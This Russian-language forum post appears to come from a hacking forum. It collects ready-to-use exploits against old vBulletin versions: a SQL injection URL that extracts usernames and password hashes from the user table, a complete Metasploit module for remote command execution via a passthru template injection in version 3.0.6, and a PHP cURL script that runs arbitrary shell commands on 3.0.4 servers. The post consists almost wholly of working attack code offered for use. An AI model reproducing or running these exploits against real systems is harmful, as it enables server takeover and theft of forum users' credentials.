|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
vBulletin 3.0.10
SQL Injection
Код:
http://123.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*
vBulletin 3.0.6
Command Execution Exploit (metasploit)
Код:
##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
'Refs' =>
[
['MIL', '832'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['vBulletin'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious vBulletin Get request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
return;
}
1;
vBulletin 3.0.4
Execute command
magic_quotes_gpc должен быть выключен
PHP код:
<?php
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: 'ls -la')\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";
exit;
}
if ($argv[4])
$proxy = $argv[4];
$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;
?>
Последний раз редактировалось Grey; 23.05.2007 в 12:34..
Причина: Удалил все, что есть в ранее написанных сообщениях.
|